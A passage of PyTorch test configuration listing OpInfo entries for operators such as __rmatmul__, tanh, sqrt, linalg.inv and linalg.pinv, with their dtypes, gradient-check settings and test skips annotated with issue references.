                    skips=(
                        DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),
                    )),
    BinaryUfuncInfo('__rxor__',
                    op=torch.Tensor.__rxor__,
                    dtypes=integral_types_and(torch.bool),
                    supports_out=False,
                    supports_autograd=False,
                    supports_forward_ad=True,
                    skips=(
                        DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),
                    )),
    OpInfo('__rmatmul__',
           op=torch.Tensor.__rmatmul__,
           dtypes=all_types_and_complex_and(torch.bfloat16),
           dtypesIfCUDA=floating_and_complex_types_and(torch.float16,
                                                       *[torch.bfloat16]
                                                       if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []),
           assert_autodiffed=True,
           sample_inputs_func=sample_inputs_matmul,
           supports_out=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           check_batched_forward_grad=False,
           decorators=(
               # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda',
                            active_if=not SM53OrLater),
               DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}),
                            'TestMathBits', 'test_conj_view'),
               DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-05, rtol=1.2e-03)}),
                            'TestCommon', 'test_noncontiguous_samples'),
           ),
           skips=(
               DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),
               DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',),
               # https://github.com/pytorch/pytorch/issues/67470
               DecorateInfo(unittest.skip("67470!"), 'TestCommon', 'test_noncontiguous_samples',
                            device_type='cpu', dtypes=(torch.long,)),
               # Fails on XLA.
               # AssertionError: False is not true : Tensors failed to compare as equal
               DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)),
               # https://github.com/pytorch/pytorch/issues/71774
               DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness',
                            device_type='cpu', dtypes=(torch.long,)),
           )),
    BinaryUfuncInfo('__rmod__',
                    op=torch.Tensor.__rmod__,
                    dtypes=floating_types_and(torch.bfloat16, torch.half,),
                    dtypesIfCUDA=all_types_and(torch.bfloat16, torch.half),
                    supports_out=False,
                    supports_forward_ad=True,
                    supports_fwgrad_bwgrad=True,
                    supports_two_python_scalars=True,
                    skips=(
                        DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),
                        DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',),
                    ),
                    # Support autograd after torch.remainder(Tensor, Tensor) supports
                    # autograd of the second argument.
                    # https://github.com/pytorch/pytorch/pull/58476/files#r637167630
                    # supports_autograd=False,
                    assert_autodiffed=True,
                    autodiff_nonfusible_nodes=['aten::remainder'],),
    BinaryUfuncInfo('__rpow__',
                    op=torch.Tensor.__rpow__,
                    dtypes=all_types_and_complex_and(torch.bfloat16, torch.half),
                    # Reference: https://github.com/pytorch/pytorch/issues/54774
                    # "log2" "_vml_cpu" not implemented for Half
                    backward_dtypes=all_types_and_complex_and(torch.bfloat16),
                    backward_dtypesIfCUDA=all_types_and_complex_and(torch.bfloat16, torch.half),
                    supports_out=False,
                    supports_forward_ad=True,
                    supports_fwgrad_bwgrad=True,
                    skips=(
                        DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),
                        DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',),
                        # TODO: FIXME tolerance is too high
                        DecorateInfo(unittest.skip('Skipped!'), 'TestGradients'),
                    ),
                    assert_autodiffed=True,
                    autodiff_nonfusible_nodes=['aten::pow'],),
    BinaryUfuncInfo('__rsub__',
                    op=torch.Tensor.__rsub__,
                    dtypes=all_types_and_complex_and(torch.bfloat16, torch.half),
                    supports_forward_ad=True,
                    supports_fwgrad_bwgrad=True,
                    supports_out=False,
                    supports_two_python_scalars=True,
                    skips=(
                        DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),
                        DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',),
                    ),
                    assert_autodiffed=True,
                    autodiff_nonfusible_nodes=['aten::rsub'],),
    BinaryUfuncInfo('rsub',
                    dtypes=all_types_and_complex_and(torch.bfloat16, torch.half),
                    supports_forward_ad=True,
                    supports_fwgrad_bwgrad=True,
                    supports_out=False,
                    supports_inplace_autograd=False,
                    assert_autodiffed=None,
                    sample_inputs_func=sample_inputs_add_sub),
    OpInfo('select',
           aten_backward_name='select_backward',
           dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool, torch.chalf),
           sample_inputs_func=sample_inputs_select,
           assert_jit_shape_analysis=True,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           supports_out=False),
    OpInfo('select_scatter',
           dtypes=all_types_and(torch.bfloat16, torch.half, torch.bool),
           sample_inputs_func=sample_inputs_select_scatter,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           supports_out=False),
    OpInfo('slice_scatter',
           dtypes=all_types_and(torch.bfloat16, torch.half, torch.bool),
           sample_inputs_func=sample_inputs_slice_scatter,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           supports_out=False),
    UnaryUfuncInfo('signbit',
                   ref=np.signbit,
                   dtypes=all_types_and(torch.bool, torch.bfloat16, torch.half),
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   supports_autograd=False,),
    UnaryUfuncInfo('tan',
                   ref=np.tan,
                   dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16),
                   assert_autodiffed=True,
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   skips=(
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    device_type='cpu', dtypes=[torch.bfloat16]),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    device_type='cpu', dtypes=[torch.bfloat16]),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small',
                                    device_type='cpu', dtypes=[torch.bfloat16]),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    device_type='cpu', dtypes=[torch.cfloat, torch.cdouble],
                                    active_if=(IS_MACOS or IS_WINDOWS)),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    device_type='cpu', dtypes=[torch.cfloat, torch.cdouble],
                                    active_if=(IS_MACOS or IS_WINDOWS)),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    device_type='cuda', dtypes=[torch.float64], active_if=TEST_WITH_ROCM),
                       DecorateInfo(unittest.skip("Skipped! sparse backward not supported"),
                                    'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'),
                       # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency',
                                    dtypes=(torch.chalf,)),
                       # same reason as above
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace',
                                    dtypes=(torch.chalf,)),
                       # same reason as above
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out',
                                    dtypes=(torch.chalf,)),
                       # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR',
                                    'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)),
                   ),
                   # tan(pi/2 * odd_number) is nan
                   reference_numerics_filter=NumericsFilter(
                       condition=lambda x: close_to_int(x / (math.pi * 0.5)),
                       safe_val=math.pi)),
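    # NumericsFilter (as used by `tan` above and `tanh` below) appears to replace inputs
    # matching `condition` with `safe_val` before reference-numerics comparisons, keeping
    # samples away from the singularities called out in the adjacent comments, where torch
    # and the numpy reference legitimately disagree.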
    UnaryUfuncInfo('tanh',
                   ref=np.tanh,
                   aten_backward_name='tanh_backward',
                   aliases=('nn.functional.tanh',),
                   decorators=(precisionOverride({torch.bfloat16: 1e-2}),),
                   dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16),
                   assert_autodiffed=True,
                   assert_jit_shape_analysis=True,
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   skips=(
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    device_type='cpu', dtypes=[torch.cfloat, torch.cdouble],
                                    active_if=(IS_MACOS or IS_WINDOWS)),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    device_type='cpu', dtypes=[torch.cfloat, torch.cdouble],
                                    active_if=(IS_MACOS or IS_WINDOWS)),
                       # alias, nn.functional.tanh, will produce (because of warning string saved):
                       # "RuntimeError: Expected to not find "tanh" but found it"
                       DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'),
                       DecorateInfo(unittest.skip("Skipped! sparse backward not supported"),
                                    'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'),
                   ),
                   # tan(j * pi/2 * odd_number) is nan
                   reference_numerics_filter=NumericsFilter(
                       condition=lambda x: (close_to_int(x / (math.pi * 0.5j))
                                            if x.is_complex() else x.new_tensor(False, dtype=torch.bool)),
                       safe_val=0)),
    OpInfo('tensor_split',
           ref=np.array_split,
           dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16),
           dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16),
           supports_out=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           skips=(
               # Pre-existing condition; Needs to be fixed
               DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'),
               DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'),
               DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'),
           ),
           sample_inputs_func=sample_inputs_tensor_split,),
    OpInfo('hsplit',
           dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.bfloat16, torch.float16),
           supports_out=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           sample_inputs_func=sample_inputs_hsplit,
           error_inputs_func=error_inputs_hsplit,),
    OpInfo('vsplit',
           dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.bfloat16, torch.float16),
           supports_out=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           sample_inputs_func=sample_inputs_vsplit,
           error_inputs_func=error_inputs_vsplit,),
    OpInfo('dsplit',
           dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.bfloat16, torch.float16),
           supports_out=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           sample_inputs_func=sample_inputs_dsplit,
           error_inputs_func=error_inputs_dsplit,),
    OpInfo('triangular_solve',
           op=torch.triangular_solve,
           dtypes=floating_and_complex_types(),
           sample_inputs_func=sample_inputs_legacy_solve,
           check_batched_gradgrad=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           gradcheck_wrapper=lambda *args, **kwargs: gradcheck_wrapper_triangular_input(*args, idx=1, **kwargs),
           decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack],
           skips=(
               # AssertionError: Scalars are not equal!
               DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),
               # Gradcheck fails
               DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad',
                            dtypes=floating_and_complex_types()),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit',
                            device_type='mps', dtypes=[torch.float32]),
           )),
    UnaryUfuncInfo('trunc',
                   aliases=('fix', ),
                   ref=np.trunc,
                   dtypes=floating_types_and(torch.bfloat16),
                   dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   assert_autodiffed=True),
    UnaryUfuncInfo('exp2',
                   aliases=('special.exp2', ),
                   ref=np_unary_ufunc_integer_promotion_wrapper(np.exp2),
                   dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16),
                   dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True),
    UnaryUfuncInfo('expm1',
                   aliases=('special.expm1', ),
                   ref=np_unary_ufunc_integer_promotion_wrapper(np.expm1),
                   dtypes=all_types_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   assert_autodiffed=True,
                   skips=(
                       # Reference: https://github.com/pytorch/pytorch/pull/48926#issuecomment-739734774
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    device_type='cpu', dtypes=[torch.bfloat16]),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    device_type='cpu', dtypes=[torch.bfloat16]),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small',
                                    device_type='cpu', dtypes=[torch.bfloat16]),
                       DecorateInfo(unittest.skip("Skipped! sparse backward not supported"),
                                    'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'),
                   )),
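    # np_unary_ufunc_integer_promotion_wrapper (used for exp2/expm1 above and reciprocal
    # below) presumably casts integer inputs to the default float dtype before invoking
    # the numpy ufunc, mirroring torch's integer-to-float promotion for these ops.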
    UnaryUfuncInfo('nan_to_num',
                   ref=np.nan_to_num,
                   dtypes=all_types_and(torch.half, torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and(torch.half, torch.bool, torch.bfloat16),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   supports_sparse=True,
                   skips=(
                       DecorateInfo(unittest.skip("Skipped! sparse backward not supported"),
                                    'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'),
                   ),
                   # Passing numpy_kwargs via sample_kwargs, as numpy does comparison
                   # with BFloat16 in float, since it currently doesn't support BFloat16.
                   # Ref: https://github.com/pytorch/pytorch/issues/57982#issuecomment-839150556
                   sample_kwargs=lambda device, dtype, input: ({},
                                                               {'posinf': torch.finfo(torch.bfloat16).max,
                                                                'neginf': torch.finfo(torch.bfloat16).min})
                   if dtype is torch.bfloat16 else ({}, {})),
    UnaryUfuncInfo('reciprocal',
                   ref=np_unary_ufunc_integer_promotion_wrapper(np.reciprocal),
                   dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16),
                   assert_autodiffed=True,
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   skips=(
                       # Reference: https://github.com/pytorch/pytorch/issues/45690
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    dtypes=[torch.cfloat, torch.cdouble]),
                       # Reference: https://github.com/pytorch/pytorch/pull/49102#issuecomment-744604601
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    dtypes=[torch.bfloat16]),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    dtypes=[torch.bfloat16]),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small',
                                    dtypes=[torch.bfloat16]),
                   )),
    UnaryUfuncInfo('rsqrt',
                   ref=lambda x: np.reciprocal(np.sqrt(x)),
                   domain=(0, None),
                   dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16),
                   decorators=(precisionOverride({torch.half: 5e-2}),),
                   assert_autodiffed=True,
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   skips=(
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    dtypes=(torch.cfloat, torch.cdouble)),
                   )),
    UnaryUfuncInfo('sqrt',
                   ref=np.sqrt,
                   supports_sparse=True,
                   domain=(0, None),
                   dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16),
                   assert_autodiffed=True,
                   supports_forward_ad=True,
                   supports_sparse_csr=True,
                   supports_fwgrad_bwgrad=True,
                   decorators=(precisionOverride({torch.bfloat16: 7e-2}),),
                   skips=(
                       # Reference: https://github.com/pytorch/pytorch/issues/47358
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    device_type='cpu', dtypes=[torch.cfloat, torch.cdouble],
                                    active_if=IS_MACOS),
                       # Reference: https://github.com/pytorch/pytorch/pull/47293#issuecomment-721774436
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    dtypes=[torch.bfloat16]),
                       DecorateInfo(unittest.skip("Skipped! sparse backward not supported"),
                                    'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'),
                   )),
    UnaryUfuncInfo('square',
                   ref=np.square,
                   dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16),
                   decorators=(precisionOverride({torch.complex64: 3e-4, torch.bfloat16: 3e-1}),),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   skips=(
                       # Reference: https://github.com/pytorch/pytorch/issues/52549
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    dtypes=[torch.cfloat, torch.cdouble]),
                       # >>> t = torch.tensor(complex(-0.01, float("inf")))
                       # >>> np.square(t.numpy())
                       # (-inf-infj)
                       # >>> t.square()
                       # tensor(-inf-infj)
                       # >>> t.cuda().square()
                       # tensor(inf+nanj, device='cuda:0')
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    device_type='cuda', dtypes=[torch.cfloat, torch.cdouble]),
                       # Reference: https://github.com/pytorch/pytorch/pull/52551#issuecomment-782596181
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    dtypes=[torch.bfloat16]),
                   ),),
    OpInfo('lerp',
           dtypes=floating_and_complex_types(),
           dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16),
           dtypesIfROCM=floating_and_complex_types_and(torch.half, torch.bfloat16),
           sample_inputs_func=sample_inputs_lerp,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           assert_autodiffed=True),
    OpInfo('linalg.inv',
           aten_name='linalg_inv',
           op=torch.linalg.inv,
           dtypes=floating_and_complex_types(),
           sample_inputs_func=sample_inputs_linalg_invertible,
           check_batched_gradgrad=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           gradcheck_nondet_tol=GRADCHECK_NONDET_TOL,
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack],
           skips=(
               # AssertionError: Scalars are not equal!
               DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit',
                            device_type='mps', dtypes=[torch.float32]),
           )),
    OpInfo('linalg.inv_ex',
           aten_name='linalg_inv_ex',
           dtypes=floating_and_complex_types(),
           sample_inputs_func=sample_inputs_linalg_invertible,
           check_batched_gradgrad=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           gradcheck_nondet_tol=GRADCHECK_NONDET_TOL,
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack],
           skips=(
               # AssertionError: Scalars are not equal!
               DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit',
                            device_type='mps', dtypes=[torch.float32]),
           )),
    UnaryUfuncInfo('angle',
                   ref=np.angle,
                   dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16),
                   dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool),
                   decorators=(precisionOverride({torch.float16: 1e-2,
                                                  torch.bfloat16: 1e-2}),),
                   backward_dtypes=floating_and_complex_types_and(torch.bfloat16, torch.float16),
                   backward_dtypesIfCUDA=floating_and_complex_types_and(torch.chalf),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   supports_sparse_csr=True,
                   supports_complex_to_float=True,
                   skips=(
                       # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR',
                                    'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,),),
                       # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out',
                                    dtypes=(torch.chalf,),),
                       # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency',
                                    dtypes=(torch.chalf,),),
                   )),
    UnaryUfuncInfo('isfinite',
                   ref=np.isfinite,
                   dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf),
                   supports_out=False,
                   supports_autograd=False),
    UnaryUfuncInfo('isinf',
                   ref=np.isinf,
                   dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf),
                   supports_out=False,
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   supports_autograd=False,
                   skips=(
                       # "nonzero_count_cpu" not implemented for 'ComplexHalf'
                       # "nonzero_cuda" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_consistency",
                                    dtypes=(torch.chalf,)),
                       # "add_out_op2_sparse_csr" not implemented for 'ComplexHalf'
                       DecorateInfo(unittest.expectedFailure, "TestSparseCSR",
                                    "test_zero_to_zero_correspondence_unary", dtypes=(torch.chalf,)),
                   )),
    UnaryUfuncInfo('isposinf',
                   ref=np.isposinf,
                   dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16),
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   supports_autograd=False),
    UnaryUfuncInfo('isneginf',
                   ref=np.isneginf,
                   dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16),
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   supports_autograd=False),
    UnaryUfuncInfo('isreal',
                   ref=np.isreal,
                   dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf),
                   supports_out=False,
                   supports_autograd=False),
    UnaryUfuncInfo('isnan',
                   ref=np.isnan,
                   dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16),
                   supports_out=False,
                   supports_sparse=True,
                   supports_sparse_csr=True,
                   supports_autograd=False),
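    # The is* predicate entries above set supports_autograd=False: their outputs are
    # boolean masks, so there is no gradient to check.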
    OpInfo('linalg.solve',
           aten_name='linalg_solve',
           op=torch.linalg.solve,
           dtypes=floating_and_complex_types(),
           sample_inputs_func=sample_inputs_linalg_solve,
           check_batched_gradgrad=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack],
           skips=(
               # AssertionError: Scalars are not equal!
               DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit',
                            device_type='mps', dtypes=[torch.float32]),
           )),
    OpInfo('linalg.solve_triangular',
           aten_name='linalg_solve_triangular',
           op=torch.linalg.solve_triangular,
           dtypes=floating_and_complex_types(),
           sample_inputs_func=sample_inputs_linalg_solve_triangular,
           supports_fwgrad_bwgrad=True,
           skips=(skipCPUIfNoLapack,),
           # linalg.solve_triangular cannot be batched over because of a call to out.copy_(result);
           supports_forward_ad=True),
    OpInfo('linalg.matrix_rank',
           aten_name='linalg_matrix_rank',
           dtypes=floating_and_complex_types(),
           supports_autograd=False,
           sample_inputs_func=sample_inputs_linalg_invertible,
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack],
           skips=(
               # Pre-existing condition; Needs to be fixed
               DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit',
                            device_type='mps', dtypes=[torch.float32]),
           ),
           ),
    OpInfo('linalg.matrix_rank',
           aten_name='linalg_matrix_rank',
           variant_test_name='hermitian',
           dtypes=floating_and_complex_types(),
           supports_autograd=False,
           sample_inputs_func=sample_inputs_linalg_pinv_hermitian,
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack],
           skips=(
               # Pre-existing condition; Needs to be fixed
               DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit',
                            device_type='mps', dtypes=[torch.float32]),
           ),
           ),
    OpInfo('linalg.pinv',
           aten_name='linalg_pinv',
           op=torch.linalg.pinv,
           dtypes=floating_and_complex_types(),
           check_batched_grad=False,
           check_batched_gradgrad=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           sample_inputs_func=sample_inputs_linalg_pinv,
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack],
           skips=(
               # errors with "leaked XXXX bytes CUDA memory on device 0"
               DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit',
                            device_type='cuda'),)
           ),
    OpInfo('linalg.pinv',
           aten_name='linalg_pinv',
           variant_test_name='singular',
           # pinv is Frechet-differentiable in a rank-preserving neighborhood,
           # so we feed inputs that are the products of two full-rank factors,
           # to avoid any rank changes caused by the perturbations in the gradcheck
           op=lambda a, b: torch.linalg.pinv(a @ b.mT),
           dtypes=floating_and_complex_types(),
           supports_out=False,
           check_batched_grad=False,
           check_batched_gradgrad=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           sample_inputs_func=sample_inputs_linalg_pinv_singular,
           # Only large tensors show issues with implicit backward used prior to
           # explicit backward implementation.
           decorators=[slowTest, skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack],
           skips=(
               DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),
               # CUDA runs out of memory
               DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad',
                            device_type='cuda', dtypes=[torch.cdouble]),
               # This test takes almost 2 hours to run!
               DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad',
                            device_type='cuda', dtypes=[torch.cdouble]),
           )),
    OpInfo('linalg.pinv',
           aten_name='linalg_pinv',
           variant_test_name='hermitian',
           dtypes=floating_and_complex_types(),
           check_batched_grad=False,
           check_batched_gradgrad=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           sample_inputs_func=sample_inputs_linalg_pinv_hermitian,
           gradcheck_wrapper=gradcheck_wrapper_hermitian_input,
           decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack],
           skips=(
